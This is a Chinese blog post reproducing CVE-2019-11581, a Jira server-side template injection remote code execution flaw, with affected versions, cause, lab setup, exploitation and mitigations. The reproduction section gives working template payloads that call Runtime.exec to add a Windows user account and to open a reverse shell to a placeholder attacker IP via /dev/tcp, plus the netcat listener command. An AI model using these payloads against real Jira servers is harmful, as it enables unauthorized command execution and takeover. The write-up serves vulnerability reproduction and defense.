jira安装及配置_漏洞复现Jira未授权服务端模板注入远程代码执行

04bf3237ac5b0516af6927af21341a04.gif

1

漏洞描述

Jira是由Atlassian公司出品的一款项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。2019年7月12日根据安全情报得知Atlassian Jira Server和Jira Data Center存在服务端模板注入远程代码执行漏洞。成功利用此漏洞的攻击者可对运行受影响版本的Jira Server或Jira Data Center的服务器执行任意命令,从而获取服务器权限,严重危害网络资产

4bf312e5824eb8c06288dff04458bc54.gif

2

CVE编号

CVE-2019-11581

4bf312e5824eb8c06288dff04458bc54.gif

3

漏洞威胁等级

高危

4bf312e5824eb8c06288dff04458bc54.gif

4

影响范围

AtlassianJira 4.4.x

AtlassianJira 5.x.x

AtlassianJira 6.x.x

AtlassianJira 7.0.x

AtlassianJira 7.1.x

AtlassianJira 7.2.x

AtlassianJira 7.3.x

AtlassianJira 7.4.x

AtlassianJira 7.5.x

AtlassianJira 7.6.x < 7.6.14

AtlassianJira 7.7.x

AtlassianJira 7.8.x

AtlassianJira 7.9.x

AtlassianJira 7.10.x

AtlassianJira 7.11.x

AtlassianJira 7.12.x

AtlassianJira 7.13.x < 7.13.5

AtlassianJira 8.0.x < 8.0.3

AtlassianJira 8.1.x < 8.1.2

AtlassianJira 8.2.x < 8.2.3

4bf312e5824eb8c06288dff04458bc54.gif

5

漏洞简析

第一种,未授权代码执行利用条件:Jira已配置好SMTP服务器,且需开启“联系网站管理员表单”功能。(从WEB界面设计上看,实际上如果没配置SMTP服务器,无法开启此功能)第二种利用场景前提是拿到Jira管理员的权限,利用条件较难满足,这里主要分析第一种情况。 “ 原因在于 atlassian-jira/WEB-INF/classes/com/atlassian/jira/web/action/user/ContactAdministrators 未对 Subject(邮件主题)处进行过滤,用户传入的邮件主题被当作template(模板)指令执行。在任何一种情况下,成功利用此漏洞的攻击者都可在运行受影响版本的Jira Server或Jira Data Center的系统上执行任意命令。 ”

4bf312e5824eb8c06288dff04458bc54.gif

6

搭建环境

这里是安装AtlassianJira 7.13.0 

下载地址:
https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-software-7.13.0-x64.exe  

安装教程:
https://www.cnblogs.com/houchaoying/p/9096118.html

efd0eb428d3eed674615d9c904c07b95.png

先登录管理员后台配置好联系管理员表单 

管理员表单默认是关闭的,需要配置好STMP才能开启

e7f86f5feb35bb2e9dd1937684a0730e.png

4bf312e5824eb8c06288dff04458bc54.gif

7

漏洞复现

无需管理员账户权限:

http://ip:port/secure/ContactAdministrators!default.jspa

需管理员账户权限:

http://ip:port/secure/admin/SendBulkMail!default.jspa

这里直接以未登录状态为例:  payload: $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('net user joecool joe@cool123 /add').waitFor() b64704d3136e152145be5065ab39e593.png

PS:大概需要等十几秒才能触发命令!!!

409e980d4fdd0ebb4e44fe657e83547e.png

linux下目标Jira系统可执行的POC:

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://www.baidu.com').waitFor() $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('bash -i >& /dev/tcp/攻击者IP/2333 0>&1').waitFor() 

攻击者主机执行:

nc  -lvvp 2333

4bf312e5824eb8c06288dff04458bc54.gif

8

漏洞修复方案

1.更新到最新版本。   

2. 若无法及时升级 Jira,则可采取以下缓解措施     

(1)禁用“联系网站管理员”功能。设置=>系统=>编辑设置=>联系管理员表单处选择“关”,然后点击最下面的“更新”保存设置;     

(2)禁止对/secure/admin/SendBulkMail!default.jspa 的访问。

4bf312e5824eb8c06288dff04458bc54.gif

9

参考

https://paper.seebug.org/982/ 

https://www.heibai.org/post/1464.html 

https://www.jianshu.com/p/ddf1233d333f 

http://blog.nsfocus.net/cve-2019-11581-2/ 

https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html

 9649ef24e8c4a103c8fff370dfbccb57.gif

bbc83fb1af52097365c57122fd9f6132.gif

5c9badc464c6f2535449791721e2fcf9.png

往期精彩回顾

a1d33e8c75e4742392c551d3742eeadf.png

某Shop前台SQL注入

浅谈DNSlog注入

CVE-2015-1328、CVE-2017-16995Ubuntu本地提权漏洞复现

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值